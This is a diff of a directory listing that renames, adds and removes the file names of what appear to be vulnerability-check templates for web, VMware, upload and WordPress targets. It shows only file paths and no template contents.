-./poc/subdomain_takeover/wishpond-takeover-11216.yaml +./poc/subdomain_takeover/wishpond-takeover-11215.yaml ./poc/subdomain_takeover/wishpond-takeover-11217.yaml ./poc/subdomain_takeover/wishpond-takeover-11218.yaml ./poc/subdomain_takeover/wishpond-takeover.yaml ./poc/subdomain_takeover/wix-takeover-11219.yaml -./poc/subdomain_takeover/wix-takeover.yaml ./poc/subdomain_takeover/wordpress-takeover-11310.yaml ./poc/subdomain_takeover/wordpress-takeover-11311.yaml -./poc/subdomain_takeover/wordpress-takeover-11312.yaml ./poc/subdomain_takeover/wordpress-takeover-11313.yaml +./poc/subdomain_takeover/wordpress-takeover-11314.yaml ./poc/subdomain_takeover/wordpress-takeover.yaml ./poc/subdomain_takeover/worksite-takeover-workflow-11389.yaml ./poc/subdomain_takeover/worksites-takeover-11388.yaml @@ -93332,7 +93339,7 @@ ./poc/subdomain_takeover/wpsite-background-takeover.yaml ./poc/subdomain_takeover/wufoo-takeover-11648.yaml ./poc/subdomain_takeover/wufoo-takeover-11649.yaml -./poc/subdomain_takeover/wufoo-takeover-11651.yaml +./poc/subdomain_takeover/wufoo-takeover-11650.yaml ./poc/subdomain_takeover/wufoo-takeover.yaml ./poc/subdomain_takeover/zendesk-takeover-11780.yaml ./poc/subdomain_takeover/zendesk-takeover-11781.yaml @@ -93344,6 +93351,7 @@ ./poc/template_injection/node-nunjucks-ssti.yaml ./poc/template_injection/pdf-signer-ssti-to-rce-9470.yaml ./poc/template_injection/pdf-signer-ssti-to-rce-9471.yaml +./poc/template_injection/pdf-signer-ssti-to-rce-9472.yaml ./poc/template_injection/pdf-signer-ssti-to-rce.yaml ./poc/template_injection/pikpikcussti.yaml ./poc/template_injection/reflection-ssti.yaml @@ -93496,7 +93504,6 @@ ./poc/upload/exposed-jquery-file-upload-7313.yaml ./poc/upload/exposed-jquery-file-upload-7314.yaml ./poc/upload/exposed-jquery-file-upload-7315.yaml -./poc/upload/exposed-jquery-file-upload.yaml ./poc/upload/fanruan-finereport-v9-design-save-svg-fileupload.yaml ./poc/upload/fanruan-oa-v9-designsavevg-upload-file.yaml ./poc/upload/fanwei-e-office-v10-fileupload.yaml @@ -93648,6 +93655,8 @@ ./poc/upload/oa-v9-uploads-file-9187.yaml ./poc/upload/oa-v9-uploads-file-9188.yaml ./poc/upload/oa-v9-uploads-file-9189.yaml +./poc/upload/oa-v9-uploads-file-9191.yaml +./poc/upload/oa-v9-uploads-file.yaml ./poc/upload/pc4uploader.yaml ./poc/upload/pigcms-manage-admin-fileupload.yaml ./poc/upload/powercreator-arbitrary-file-upload.yaml @@ -93737,6 +93746,7 @@ ./poc/upload/telerik-fileupload-detect-10692.yaml ./poc/upload/telerik-fileupload-detect-10693.yaml ./poc/upload/telerik-fileupload-detect-10694.yaml +./poc/upload/telerik-fileupload-detect-10695.yaml ./poc/upload/telerik-fileupload-detect-10696.yaml ./poc/upload/telerik-fileupload-detect-10697.yaml ./poc/upload/telerik-fileupload-detect.yaml @@ -93897,8 +93907,7 @@ ./poc/upload/wp-s3-smart-upload.yaml ./poc/upload/wp-upload-data-11602.yaml ./poc/upload/wp-upload-data-11603.yaml -./poc/upload/wp-upload-data-11604.yaml -./poc/upload/wp-upload-data.yaml +./poc/upload/wp-upload-data-11605.yaml ./poc/upload/wp-upload-restriction-34ada383253b9728876613379fa9dea6.yaml ./poc/upload/wp-upload-restriction-3b5c347348b988baaab2601e987517ae.yaml ./poc/upload/wp-upload-restriction-81b96fa379daa9e93cab1ad57b78f1f7.yaml @@ -93932,6 +93941,7 @@ ./poc/upload/yonyou-uploadApk-fileupload.yaml ./poc/upload/yonyou_U8-upload-FileUpload.yaml ./poc/upload/youyong-jsinvoke-upload.yaml +./poc/upload/zhiyuan-file-upload-11791.yaml ./poc/upload/zhiyuan-file-upload-11792.yaml ./poc/upload/zhiyuan-file-upload-11793.yaml ./poc/upload/zhiyuan-file-upload-11794.yaml @@ -93958,9 +93968,9 @@ ./poc/vmware/vmware-esxi.yaml ./poc/vmware/vmware-ftp-server.yaml ./poc/vmware/vmware-hcx-login.yaml +./poc/vmware/vmware-horizon-11038.yaml ./poc/vmware/vmware-horizon-11039.yaml ./poc/vmware/vmware-horizon-11040.yaml -./poc/vmware/vmware-horizon-11041.yaml ./poc/vmware/vmware-horizon-daas.yaml ./poc/vmware/vmware-horizon-log4j-jndi-rce-11033.yaml ./poc/vmware/vmware-horizon-log4j-jndi-rce-11034.yaml @@ -93970,6 +93980,7 @@ ./poc/vmware/vmware-horizon-panel-11037.yaml ./poc/vmware/vmware-horizon-panel.yaml ./poc/vmware/vmware-horizon.yaml +./poc/vmware/vmware-log4j.yaml ./poc/vmware/vmware-nsx-login.yaml ./poc/vmware/vmware-server-2.yaml ./poc/vmware/vmware-vcenter-arbitrary-file-read.yaml @@ -93979,32 +93990,31 @@ ./poc/vmware/vmware-vcenter-lfi-1.yaml ./poc/vmware/vmware-vcenter-lfi-11046.yaml ./poc/vmware/vmware-vcenter-lfi-11047.yaml -./poc/vmware/vmware-vcenter-lfi-11048.yaml ./poc/vmware/vmware-vcenter-lfi-2.yaml ./poc/vmware/vmware-vcenter-lfi-3.yaml ./poc/vmware/vmware-vcenter-lfi-linux-11042.yaml ./poc/vmware/vmware-vcenter-lfi-linux-11043.yaml -./poc/vmware/vmware-vcenter-lfi-linux-11045.yaml +./poc/vmware/vmware-vcenter-lfi-linux-11044.yaml +./poc/vmware/vmware-vcenter-lfi-linux.yaml +./poc/vmware/vmware-vcenter-lfi.yaml ./poc/vmware/vmware-vcenter-log4j-jndi-rce-11049.yaml ./poc/vmware/vmware-vcenter-log4j-jndi-rce-11050.yaml ./poc/vmware/vmware-vcenter-ssrf-11051.yaml ./poc/vmware/vmware-vcenter-ssrf-11052.yaml -./poc/vmware/vmware-vcenter-ssrf-11053.yaml ./poc/vmware/vmware-vcenter-unauthorized-rce-cve-2021-21972.yml ./poc/vmware/vmware-vcenter.yaml ./poc/vmware/vmware-vcloud-director.yaml -./poc/vmware/vmware-version-detect-11054.yaml ./poc/vmware/vmware-version-detect-11055.yaml ./poc/vmware/vmware-version-detect.yaml ./poc/vmware/vmware-virtualcenter.yaml ./poc/vmware/vmware-vrealize-cve-2021-21975-ssrf.yml ./poc/vmware/vmware-vrealize-detect-11056.yaml ./poc/vmware/vmware-vrealize-detect-11057.yaml +./poc/vmware/vmware-vrealize-detect.yaml ./poc/vmware/vmware-vrealize-operations-manager.yaml ./poc/vmware/vmware-vrealize.yaml ./poc/vmware/vmware-vsphere.yaml ./poc/vmware/vmware-workflow-11059.yaml -./poc/vmware/vmware-workflow.yaml ./poc/vmware/vmware-workspace-one-log4j-rce.yaml ./poc/vmware/vmwareview.yaml ./poc/web/360-webscan.yaml @@ -94037,7 +94047,7 @@ ./poc/web/Wordpress-NMedia_Website_Contact_Form-FileInclude.yaml ./poc/web/a2b-webserver.yaml ./poc/web/abyss-web-server-11.yaml -./poc/web/abyss-web-server-13.yaml +./poc/web/abyss-web-server-12.yaml ./poc/web/abyss-web-server.yaml ./poc/web/acceso-web-portal.yaml ./poc/web/achecker-web-accessibility-evaluation-tool.yaml @@ -94059,19 +94069,19 @@ ./poc/web/allwebmenus-wordpress-menu-plugin-6fccf9724ad0c3a7999ba4458a09dec3.yaml ./poc/web/allwebmenus-wordpress-menu-plugin-a99cc6da4cf5abaf11a1d7b1038cbfb5.yaml ./poc/web/allwebmenus-wordpress-menu-plugin.yaml +./poc/web/alphaweb-default-login-275.yaml ./poc/web/alphaweb-default-login-276.yaml -./poc/web/alphaweb-default-login-277.yaml ./poc/web/alphaweb-default-login.yaml ./poc/web/am-websystem.yaml ./poc/web/amazon-web-services-phish.yaml ./poc/web/apache-oozie-web-console.yaml -./poc/web/api-webex.yaml +./poc/web/api-webex-515.yaml ./poc/web/appsmith-web-login.yaml ./poc/web/arangodb-web-Interface.yaml ./poc/web/archibus-webcentral-panel.yaml +./poc/web/artica-web-proxy-detect-543.yaml ./poc/web/artica-web-proxy-detect-544.yaml ./poc/web/artica-web-proxy-detect-546.yaml -./poc/web/artica-web-proxy-detect.yaml ./poc/web/artica-web-proxy-workflow.yaml ./poc/web/automatedlogiccorporation-webctrl.yaml ./poc/web/avtech-video-web-server.yaml @@ -94079,9 +94089,9 @@ ./poc/web/aweber-web-form-widget-c070ace57d729df423583eeb78a21210.yaml ./poc/web/aweber-web-form-widget.yaml ./poc/web/axel-webserver.yaml -./poc/web/axigen-webadmin-659.yaml ./poc/web/axigen-webadmin-660.yaml ./poc/web/axigen-webadmin-661.yaml +./poc/web/axigen-webadmin.yaml ./poc/web/axigen-webmail-662.yaml ./poc/web/axigen-webmail-664.yaml ./poc/web/axis2-web.yaml @@ -94094,6 +94104,7 @@ ./poc/web/azure-website-enum.yaml ./poc/web/bizcalendar-web-bbb880210d42a6df93041f7b5a68a42e.yaml ./poc/web/bizcalendar-web.yaml +./poc/web/boa-web-fileread-11846.yaml ./poc/web/boa-web-fileread.yaml ./poc/web/carel-pcoweb-hvac-bacnet-gateway-directory-traversal.yaml ./poc/web/catch-web-tools-7e509c5743e470c1816b86d61338d841.yaml @@ -94117,8 +94128,8 @@ ./poc/web/cobbler-webgui-1122.yaml ./poc/web/cobbler-webgui-1123.yaml ./poc/web/cobbler-webgui.yaml +./poc/web/codemeter-webadmin-panel-1135.yaml ./poc/web/codemeter-webadmin-panel-1136.yaml -./poc/web/codemeter-webadmin-panel-1137.yaml ./poc/web/codemeter-webadmin-panel-1138.yaml ./poc/web/codemeter-webadmin-panel.yaml ./poc/web/codemeter-webadmin.yaml @@ -94154,7 +94165,6 @@ ./poc/web/drupal_module-webform-remote-code-execution.yaml ./poc/web/drwebantivirus.yaml ./poc/web/dynamicweb-panel-7143.yaml -./poc/web/dynamicweb-panel-7144.yaml ./poc/web/dynamicweb-panel.yaml ./poc/web/dynamicweb-workflow.yaml ./poc/web/dynaweb-httpd.yaml @@ -94189,9 +94199,9 @@ ./poc/web/evse-web-panel.yaml ./poc/web/ewebeditor.yaml ./poc/web/ewebs-arbitrary-file-reading-7270.yaml +./poc/web/ewebs-arbitrary-file-reading-7271.yaml ./poc/web/ewebs-arbitrary-file-reading-7272.yaml ./poc/web/ewebs-arbitrary-file-reading-7273.yaml -./poc/web/ewebs-arbitrary-file-reading.yaml ./poc/web/ewebs-lfi.yaml ./poc/web/ewebs.yaml ./poc/web/exposed-webalizer-7358.yaml @@ -94211,6 +94221,7 @@ ./poc/web/feedweb-plugin.yaml ./poc/web/feedweb.yaml ./poc/web/fingerprinthub-web-fingerprints-7479.yaml +./poc/web/fingerprinthub-web-fingerprints-7480.yaml ./poc/web/fingerprinthub-web-fingerprints-7481.yaml ./poc/web/fingerprinthub-web-fingerprints.yaml ./poc/web/five-minute-webshop-7552fa5d1f3d06ebacccbdbb8bbb515e.yaml @@ -94229,8 +94240,8 @@ ./poc/web/formassembly-web-forms-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/web/formassembly-web-forms-plugin.yaml ./poc/web/formassembly-web-forms.yaml -./poc/web/fortiweb-panel-7537.yaml ./poc/web/fortiweb-panel-7538.yaml +./poc/web/fortiweb-panel-7539.yaml ./poc/web/fortiweb-panel.yaml ./poc/web/g-web-shop-238f655f125fd9eb47ac850e4dd0308d.yaml ./poc/web/g-web-shop-8bcbd9df7ad066b369f27b7e164ccd0c.yaml @@ -94246,10 +94257,12 @@ ./poc/web/geovision-geowebserver-lfi-7595.yaml ./poc/web/geovision-geowebserver-lfi-7596.yaml ./poc/web/geovision-geowebserver-lfi-7597.yaml +./poc/web/geovision-geowebserver-lfi.yaml ./poc/web/geovision-geowebserver-xss-7598.yaml ./poc/web/geovision-geowebserver-xss-7599.yaml ./poc/web/geovision-geowebserver-xss-7600.yaml ./poc/web/geovision-geowebserver-xss-7601.yaml +./poc/web/geovision-geowebserver-xss.yaml ./poc/web/geowebcache.yaml ./poc/web/geowebserver-detector.yaml ./poc/web/geowebserver-workflow.yaml @@ -94262,7 +94275,7 @@ ./poc/web/h3c-web应用防火墙.yaml ./poc/web/h3c-web网管.yaml ./poc/web/hanweb-system.yaml -./poc/web/hashicorp-consul-webgui-7897.yaml +./poc/web/hashicorp-consul-webgui-7896.yaml ./poc/web/hashicorp-consul-webgui-7898.yaml ./poc/web/hashicorp-consul-webgui.yaml ./poc/web/heading-web-server.yaml @@ -94307,6 +94320,7 @@ ./poc/web/ibm-webseal.yaml ./poc/web/ibm-websphere-admin-panel.yaml ./poc/web/ibm-websphere-panel.yaml +./poc/web/ibm-websphere-ssrf-8126.yaml ./poc/web/ibm-websphere-ssrf.yaml ./poc/web/ibm-websphere.yaml ./poc/web/icewarp-webclient-basic-rce.yaml @@ -94314,11 +94328,9 @@ ./poc/web/icewarp-webclient-rce-8130.yaml ./poc/web/icewarp-webclient-rce-8131.yaml ./poc/web/icewarp-webclient-rce-8132.yaml -./poc/web/icewarp-webclient-rce.yaml ./poc/web/icinga-web-login-8134.yaml ./poc/web/icinga-web-login-8135.yaml ./poc/web/icinga-web-login-8136.yaml -./poc/web/icinga-web-login-8137.yaml ./poc/web/icinga-web-login.yaml ./poc/web/ideawebserver.yaml ./poc/web/igenus-webmail.yaml @@ -94350,7 +94362,7 @@ ./poc/web/keenetic-web-login-8439.yaml ./poc/web/keenetic-web-login-8440.yaml ./poc/web/keenetic-web-login-8441.yaml -./poc/web/keenetic-web-login-8443.yaml +./poc/web/keenetic-web-login-8442.yaml ./poc/web/keenetic-web-login.yaml ./poc/web/keil-embedded-web-server.yaml ./poc/web/kerio-webstar.yaml @@ -94375,8 +94387,9 @@ ./poc/web/microsoft-remote-web-workplace.yaml ./poc/web/microsoft-teams-webhook-8856.yaml ./poc/web/microsoft-teams-webhook-8857.yaml +./poc/web/microsoft-teams-webhook-8858.yaml ./poc/web/microweber-detect-8862.yaml -./poc/web/microweber-detect-8863.yaml +./poc/web/microweber-detect.yaml ./poc/web/microweber-stored-xss.yaml ./poc/web/microweber-xss-8864.yaml ./poc/web/microweber-xss-8865.yaml @@ -94431,8 +94444,8 @@ ./poc/web/openvz-web-login.yaml ./poc/web/opt-webfieldassis.yaml ./poc/web/oracle-iplanet-web-server-9391.yaml +./poc/web/oracle-iplanet-web-server-9392.yaml ./poc/web/oracle-iplanet-web-server-9393.yaml -./poc/web/oracle-iplanet-web-server.yaml ./poc/web/oracle-webdb.yaml ./poc/web/oracle-weblogic.yaml ./poc/web/original-texts-yandex-webmaster-2e0593c9307af66de377149e0e6a4d6c.yaml @@ -94480,24 +94493,22 @@ ./poc/web/ruijie_EWEB_route_auth_rce.yaml ./poc/web/saia-web-server-info-9978.yaml ./poc/web/saia-web-server-info-9979.yaml -./poc/web/saia-web-server-info.yaml +./poc/web/saia-web-server-info-9980.yaml ./poc/web/samphpweb.yaml ./poc/web/sap-netweaver-webgui-10056.yaml ./poc/web/sap-netweaver-webgui-10057.yaml ./poc/web/sap-netweaver-webgui-10059.yaml -./poc/web/sap-netweaver-webgui.yaml ./poc/web/sap-nw-abap-webgui.yaml ./poc/web/sap-web-application-server.yaml ./poc/web/sap-web-dispatcher-10074.yaml ./poc/web/sap-web-dispatcher-10075.yaml ./poc/web/sap-web-dispatcher-10076.yaml ./poc/web/sap-web-dispatcher-10077.yaml +./poc/web/sap-web-dispatcher-10078.yaml ./poc/web/sap-web-dispatcher-admin-portal-10069.yaml -./poc/web/sap-web-dispatcher-admin-portal-10070.yaml ./poc/web/sap-web-dispatcher-admin-portal-10071.yaml ./poc/web/sap-web-dispatcher-admin-portal-10072.yaml ./poc/web/sap-web-dispatcher-admin-portal-10073.yaml -./poc/web/sap-web-dispatcher.yaml ./poc/web/sauter-moduwebvision-panel.yaml ./poc/web/savant-web-server.yaml ./poc/web/screwturn-wiki-web-service.yaml @@ -94567,8 +94578,8 @@ ./poc/web/titannit-web-ssrf.yaml ./poc/web/topfreeweb-charging.yaml ./poc/web/toshiba-topaccess-webserver.yaml -./poc/web/total-web-10814.yaml ./poc/web/total-web-10815.yaml +./poc/web/total-web-10816.yaml ./poc/web/total-web-solutions-panel.yaml ./poc/web/total-web.yaml ./poc/web/transbank-webpay-plus-rest-b22fd365ed7d35e56875e8d0153ca1a9.yaml @@ -94641,8 +94652,8 @@ ./poc/web/web-file-manager.yaml ./poc/web/web-framework-detect.yaml ./poc/web/web-ftp-detect-11135.yaml -./poc/web/web-ftp-detect-11136.yaml ./poc/web/web-ftp-detect-11137.yaml +./poc/web/web-ftp-detect-11138.yaml ./poc/web/web-instant-messenger-4ae688b6df13f1343923a0c3f1daa933.yaml ./poc/web/web-instant-messenger-9f1a3ebaf2a4998375881ec7b6da0d8f.yaml ./poc/web/web-instant-messenger-d41d8cd98f00b204e9800998ecf8427e.yaml @@ -94652,8 +94663,8 @@ ./poc/web/web-invoice-568a28d02436de053e0789f1133f8a51.yaml ./poc/web/web-invoice-639321e1bd4c22ce8fd4e6ce306ce3fd.yaml ./poc/web/web-invoice.yaml -./poc/web/web-local-craft-11139.yaml ./poc/web/web-local-craft-11140.yaml +./poc/web/web-local-craft-11141.yaml ./poc/web/web-local-craft.yaml ./poc/web/web-minimalist-200901-c22f0a0c3966959ccbbc8e0bebf65053.yaml ./poc/web/web-minimalist-200901.yaml @@ -94665,9 +94676,7 @@ ./poc/web/web-stories-0534ad78fbe08e9117469de7739eaf9f.yaml ./poc/web/web-stories-fc9200f38f324ac4675bb76c80fa16f7.yaml ./poc/web/web-stories.yaml -./poc/web/web-suite-detect-11167.yaml ./poc/web/web-suite-detect-11168.yaml -./poc/web/web-suite-detect.yaml ./poc/web/web-viewer-panel.yaml ./poc/web/web-wiz-rich-text-editor.yaml ./poc/web/web-xml-finder.yaml @@ -94709,7 +94718,7 @@ ./poc/web/webcam-2way-videochat-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/web/webcam-2way-videochat-plugin.yaml ./poc/web/webcam-2way-videochat.yaml -./poc/web/webcamxp-5.yaml +./poc/web/webcamxp-5-11122.yaml ./poc/web/webcomco-panel.yaml ./poc/web/webeditors-1.yaml ./poc/web/webeditors-11128.yaml @@ -94736,7 +94745,7 @@ ./poc/web/webflow-pages-1ea2b2d3f70cdc2bbd228fad03d8cc84.yaml ./poc/web/webflow-pages.yaml ./poc/web/webflow-takeover-11131.yaml -./poc/web/webflow-takeover-11132.yaml +./poc/web/webflow-takeover-11133.yaml ./poc/web/webflow-takeover-11134.yaml ./poc/web/webflow-takeover.yaml ./poc/web/webfolio-31eb77eaefc61e112478e9f1952e822d.yaml @@ -94784,7 +94793,6 @@ ./poc/web/weblogic-cve-2019-2729-2.yml ./poc/web/weblogic-cve-2020-14750.yml ./poc/web/weblogic-detect-11142.yaml -./poc/web/weblogic-detect-11143.yaml ./poc/web/weblogic-detect-11144.yaml ./poc/web/weblogic-detect-11145.yaml ./poc/web/weblogic-detect-11146.yaml @@ -94799,11 +94807,10 @@ ./poc/web/weblogic-ssrf.yaml ./poc/web/weblogic-ssrf.yml ./poc/web/weblogic-t3-detect-11151.yaml -./poc/web/weblogic-t3-detect-11152.yaml +./poc/web/weblogic-t3-detect-11153.yaml ./poc/web/weblogic-t3-detect.yaml ./poc/web/weblogic-t3-search.yaml ./poc/web/weblogic-uddiexplorer.yaml -./poc/web/weblogic-weak-login-11154.yaml ./poc/web/weblogic-weak-login-11155.yaml ./poc/web/weblogic-weak-login-11156.yaml ./poc/web/weblogic-workflow-11157.yaml @@ -94833,6 +94840,7 @@ ./poc/web/webmodule-ee-11162.yaml ./poc/web/webmodule-ee-11163.yaml ./poc/web/webmodule-ee-panel-11160.yaml +./poc/web/webmodule-ee-panel-11161.yaml ./poc/web/webmodule-ee-panel.yaml ./poc/web/webmodule-ee.yaml ./poc/web/webp-converter-for-media-a33c88596c6b666a69762f624cf7c81b.yaml @@ -94892,18 +94900,19 @@ ./poc/web/webui-rce-11172.yaml ./poc/web/webui-rce-11173.yaml ./poc/web/webui-rce-11174.yaml +./poc/web/webui-rce.yaml ./poc/web/webuploader.yaml ./poc/web/webuzo-admin-panel.yaml ./poc/web/webuzo-installer.yaml ./poc/web/webview-addjavascript-interface-11175.yaml -./poc/web/webview-addjavascript-interface-11177.yaml +./poc/web/webview-addjavascript-interface-11176.yaml ./poc/web/webview-addjavascript-interface.yaml ./poc/web/webview-javascript-11178.yaml ./poc/web/webview-javascript.yaml -./poc/web/webview-load-url-11181.yaml +./poc/web/webview-load-url-11180.yaml ./poc/web/webview-load-url-11182.yaml ./poc/web/webview-load-url.yaml -./poc/web/webview-universal-access-11184.yaml +./poc/web/webview-universal-access-11183.yaml ./poc/web/webview-universal-access-11185.yaml ./poc/web/webview-universal-access.yaml ./poc/web/webwinkelkeur-ced2503806e6d345fdbe860b7d0f8b57.yaml @@ -94933,7 +94942,6 @@ ./poc/web/xp-webcam-11696.yaml ./poc/web/xp-webcam-11697.yaml ./poc/web/xp-webcam-11698.yaml -./poc/web/xp-webcam-11699.yaml ./poc/web/xweb500-panel.yaml ./poc/web/yonyou-nc-ncfindweb-directory-traversal.yaml ./poc/web/yonyou-u9-umwebservice-fileread.yaml @@ -94951,6 +94959,7 @@ ./poc/web/zingiri-web-shop.yaml ./poc/web/zoho-webhook-token-11835.yaml ./poc/web/zoho-webhook-token-11836.yaml +./poc/web/zoho-webhook-token-11837.yaml ./poc/web/佑友-mailgard-webmail.yaml ./poc/web/启明星辰-天清web应用安全网关.yaml ./poc/web/天融信-web应用安全网关.yaml @@ -95552,7 +95561,6 @@ ./poc/wordpress/easy-wp-smtp-d3e708a3af2042a6e5853dc6a112ceae.yaml ./poc/wordpress/easy-wp-smtp-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/wordpress/easy-wp-smtp-e105c23e6058137711e2a12fec6f051e.yaml -./poc/wordpress/easy-wp-smtp-listing-7154.yaml ./poc/wordpress/easy-wp-smtp-listing-7155.yaml ./poc/wordpress/easy-wp-smtp-listing-7156.yaml ./poc/wordpress/easy-wp-smtp-listing.yaml @@ -95568,6 +95576,7 @@ ./poc/wordpress/elevate-wp.yaml ./poc/wordpress/embedplus-for-wordpress-a759e03a3140ab5da9f810ffbdb3a4c2.yaml ./poc/wordpress/embedplus-for-wordpress.yaml +./poc/wordpress/empowerwp-e011f0fe3c18de1eb10e2fd479a3ee1d.yaml ./poc/wordpress/enable-wp-debug-from-admin-dashboard-3b7a5beec4fa2de44187a4e3e87c26fe.yaml ./poc/wordpress/enable-wp-debug-from-admin-dashboard-3dd429958070257d397e464122420c2e.yaml ./poc/wordpress/enable-wp-debug-from-admin-dashboard-92e22c900b4a271caa61200d92c6f10d.yaml @@ -95620,7 +95629,6 @@ ./poc/wordpress/feedwordpress-db142dc7dc2479e241016bfec90b9659.yaml ./poc/wordpress/feedwordpress-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/wordpress/feedwordpress-plugin.yaml -./poc/wordpress/feedwordpress-xss-7459.yaml ./poc/wordpress/feedwordpress-xss-7460.yaml ./poc/wordpress/feedwordpress-xss.yaml ./poc/wordpress/feedwordpress.yaml @@ -96219,10 +96227,12 @@ ./poc/wordpress/n-media-wp-simple-quiz-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/wordpress/n-media-wp-simple-quiz-plugin.yaml ./poc/wordpress/n-media-wp-simple-quiz.yaml +./poc/wordpress/nativechurch-wp-theme-lfd-8999.yaml ./poc/wordpress/nativechurch-wp-theme-lfd-9000.yaml ./poc/wordpress/nativechurch-wp-theme-lfd-9001.yaml ./poc/wordpress/nativechurch-wp-theme-lfd-9002.yaml ./poc/wordpress/nativechurch-wp-theme-lfd-9003.yaml +./poc/wordpress/nativechurch-wp-theme-lfd.yaml ./poc/wordpress/nex-forms-express-wp-form-builder-03800489aeb5ec718d025ca048ebef5f.yaml ./poc/wordpress/nex-forms-express-wp-form-builder-0edf774a73681701d15ccd27145d0f02.yaml ./poc/wordpress/nex-forms-express-wp-form-builder-114bbf244df9c7fd1e8612fd62abeff4.yaml @@ -96448,6 +96458,7 @@ ./poc/wordpress/simple-wp-sitemap.yaml ./poc/wordpress/sitewide-notice-wp-58a86416f6928ffaebea7ce6e0d13c21.yaml ./poc/wordpress/sitewide-notice-wp.yaml +./poc/wordpress/skyline-wp-1095b08570fd71d7f3c066aaeb5a9c18.yaml ./poc/wordpress/slash-wp-2d8c26624d497c9dfac75dccb30f86dc.yaml ./poc/wordpress/slash-wp-8a48fa8e6bd9d216df9d01cc8bb97778.yaml ./poc/wordpress/slash-wp-b4a723909517827f1baf3048f87eefbe.yaml @@ -96604,6 +96615,7 @@ ./poc/wordpress/verweise-wordpress-twitter.yaml ./poc/wordpress/videojs-html5-video-player-for-wordpress-4eb103ae150e63f14ea0465bbdd222cb.yaml ./poc/wordpress/videojs-html5-video-player-for-wordpress.yaml +./poc/wordpress/viewpoint-system-status-11016.yaml ./poc/wordpress/viewpoint-system-status-11017.yaml ./poc/wordpress/viewpoint-system-status-11018.yaml ./poc/wordpress/viewpoint-system-status-11019.yaml @@ -96918,7 +96930,7 @@ ./poc/wordpress/wordpress-afad16faf36b64e536b10247898859bf.yaml ./poc/wordpress/wordpress-affiliatewp-log-11240.yaml ./poc/wordpress/wordpress-affiliatewp-log-11241.yaml -./poc/wordpress/wordpress-affiliatewp-log-11243.yaml +./poc/wordpress/wordpress-affiliatewp-log-11242.yaml ./poc/wordpress/wordpress-affiliatewp-log-11244.yaml ./poc/wordpress/wordpress-affiliatewp-log.yaml ./poc/wordpress/wordpress-arbitrary-file-download.yaml @@ -96951,6 +96963,7 @@ ./poc/wordpress/wordpress-bbe7d5752179155e1a73c493a9edc901.yaml ./poc/wordpress/wordpress-bbpress-plugin-listing-11245.yaml ./poc/wordpress/wordpress-bbpress-plugin-listing-11246.yaml +./poc/wordpress/wordpress-bbpress-plugin-listing.yaml ./poc/wordpress/wordpress-bc11188030c5ef34e44564c173b85b3b.yaml ./poc/wordpress/wordpress-bcae5ef6c0a4aa3c431c36626afbf967.yaml ./poc/wordpress/wordpress-bcee80614ad35036078b4b38fac65ba7.yaml @@ -97030,13 +97043,13 @@ ./poc/wordpress/wordpress-database-reset-bb118af862f0dedbb8fbcebd4f28d2c3.yaml ./poc/wordpress/wordpress-database-reset.yaml ./poc/wordpress/wordpress-db-backup-11251.yaml +./poc/wordpress/wordpress-db-backup-listing-11248.yaml ./poc/wordpress/wordpress-db-backup-listing-11249.yaml -./poc/wordpress/wordpress-db-backup-listing-11250.yaml ./poc/wordpress/wordpress-db-backup-listing.yaml ./poc/wordpress/wordpress-db-backup.yaml -./poc/wordpress/wordpress-db-repair-11252.yaml ./poc/wordpress/wordpress-db-repair-11253.yaml ./poc/wordpress/wordpress-db-repair-11254.yaml +./poc/wordpress/wordpress-db-repair-11255.yaml ./poc/wordpress/wordpress-db-repair.yaml ./poc/wordpress/wordpress-db3daefc79ef0c3afc5d2a722651f6df.yaml ./poc/wordpress/wordpress-dc0f502ac4588bfe8cd3ddc00f203d36.yaml @@ -97046,9 +97059,9 @@ ./poc/wordpress/wordpress-de03b87f4ceb36bcd460178f68d510a8.yaml ./poc/wordpress/wordpress-debug-log-11256.yaml ./poc/wordpress/wordpress-debug-log-11257.yaml -./poc/wordpress/wordpress-debug-log-11258.yaml +./poc/wordpress/wordpress-debug-log-11259.yaml ./poc/wordpress/wordpress-debug-log.yaml -./poc/wordpress/wordpress-detect-11261.yaml +./poc/wordpress/wordpress-detect-11260.yaml ./poc/wordpress/wordpress-detect.yaml ./poc/wordpress/wordpress-detect2.yaml ./poc/wordpress/wordpress-directory-listing-1.yaml @@ -97056,6 +97069,7 @@ ./poc/wordpress/wordpress-directory-listing-11263.yaml ./poc/wordpress/wordpress-directory-listing-11264.yaml ./poc/wordpress/wordpress-directory-listing-11265.yaml +./poc/wordpress/wordpress-directory-listing-11266.yaml ./poc/wordpress/wordpress-directory-listing-2.yaml ./poc/wordpress/wordpress-directory-listing-3.yaml ./poc/wordpress/wordpress-directory-listing-4.yaml @@ -97095,6 +97109,7 @@ ./poc/wordpress/wordpress-ef96ecb2cd1265aea759b558ece60c76.yaml ./poc/wordpress/wordpress-elementor-plugin-listing-11267.yaml ./poc/wordpress/wordpress-elementor-plugin-listing-11268.yaml +./poc/wordpress/wordpress-elementor-plugin-listing-11269.yaml ./poc/wordpress/wordpress-emails-verification-for-woocommerce-1.yaml ./poc/wordpress/wordpress-emails-verification-for-woocommerce-11270.yaml ./poc/wordpress/wordpress-emails-verification-for-woocommerce-11271.yaml @@ -97103,7 +97118,7 @@ ./poc/wordpress/wordpress-emergency-script-11272.yaml ./poc/wordpress/wordpress-emergency-script-11273.yaml ./poc/wordpress/wordpress-emergency-script-11274.yaml -./poc/wordpress/wordpress-emergency-script-11276.yaml +./poc/wordpress/wordpress-emergency-script-11275.yaml ./poc/wordpress/wordpress-emergency-script-11277.yaml ./poc/wordpress/wordpress-emergency-script.yaml ./poc/wordpress/wordpress-env.yaml @@ -97168,13 +97183,14 @@ ./poc/wordpress/wordpress-gdpr-7c5c53c8eaf2ec27b04a769490da718e.yaml ./poc/wordpress/wordpress-gdpr.yaml ./poc/wordpress/wordpress-git-config-1.yaml -./poc/wordpress/wordpress-git-config-11278.yaml ./poc/wordpress/wordpress-git-config-11279.yaml ./poc/wordpress/wordpress-git-config-2.yaml +./poc/wordpress/wordpress-gotmls-detect-11280.yaml ./poc/wordpress/wordpress-gotmls-detect-11281.yaml ./poc/wordpress/wordpress-gotmls-detect.yaml ./poc/wordpress/wordpress-gtranslate-plugin-listing-11282.yaml ./poc/wordpress/wordpress-gtranslate-plugin-listing-11283.yaml +./poc/wordpress/wordpress-gtranslate-plugin-listing-11284.yaml 